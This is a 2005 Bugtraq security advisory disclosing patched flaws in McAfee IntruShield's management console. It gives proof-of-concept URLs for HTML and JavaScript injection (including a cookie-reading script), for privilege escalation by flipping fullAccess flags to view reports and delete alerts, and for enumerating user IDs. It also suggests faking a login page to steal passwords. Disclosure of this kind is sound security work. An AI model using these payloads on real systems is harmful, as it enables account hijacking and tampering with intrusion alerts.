[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: McAfee Intrushield IPS Abuse
From: c0ntexb () gmail ! com
Date: 2005-07-06 15:03:06
Message-ID: 20050706150306.28631.qmail () securityfocus ! com
[Download RAW message or body]
/*
*****************************************************************************************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
"The McAfee IntruShield Security Management System is an advanced solution for \
administering IntruShield sensor appliance deployments. The IntruShield Security \
Management System (ISM) can support both large and small network intrusion \
prevention system (IPS) deployments and can scale up to several hundred sensor \
appliances. By integrating a comprehensive set of Best-in-Class security management \
functions, the IntruShield Security Management System dramatically simplifies and \
streamlines the complexities associated with IPS configuration, policy compliance, \
and threat and response management."
I have found some security vulnerabilities in this product whereby a user can \
elevate their privileges from a user that can only view alerts logged by remote \
sensors, to a scenario where the user can gain access to acknowledge, accept and \
delete alerts and access the Management Console. It is also possible to inject \
malicious HTML and JavaScript into the URLS and have this malicious script run on the \
clients machine, allowing for account information hijacking.
A new version has been released to address these bugs and can be downloaded from \
their site.
*/
Issues:
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console
Note: for issues 1 - 4, the attacker needs a valid user account.
1) It is possible to embed HTML into the MISMS. This could potentially allow \
phishing attacks to be performed against a valid Manager account.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 \
> </iframe>&severity=critical&count=1
2) It is possible to embed JavaScript into the MISMS and have the embedded script \
execute in the security context of the user browsing the Management System.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=Demo&resourceName=<script>alert("There could be trouble \
ahead")</script><script>alert(document.cookie) \
</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
Critical&severity=critical&count=1
3) It is possible to access the restricted "Generate Reports" section of the MISMS \
and as such, a non-privileged user can gain important information regarding the \
configuration and set-up of the IP devices being managed by the Service. This can be \
achieved by simply changing the Access option from false to true.
https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
selectedDomain=0&fullAccessRight=true
4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS \
console by modifying URL's sent to the system by simply changing the Access option \
from false to true.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
critical&count=1
Each change is emailed out to the administrator, however the email only says that \
"someone" made a change.
5) As default, all user ID values are passed in the URL in the clear, meaning that \
it is trivial for an attacker to brute force accounts until a privileged Manager \
account is found. An example of this would look similar to:
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif
This process can be continued until a valid user ID has been found with privileges \
to access the configure screen.
Since javascript can be run in the browsers of clients accessing the device, it \
would be possible to redraw the page with IFRAME's and recreate the user login page \
to snoop usersnames and passwords.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic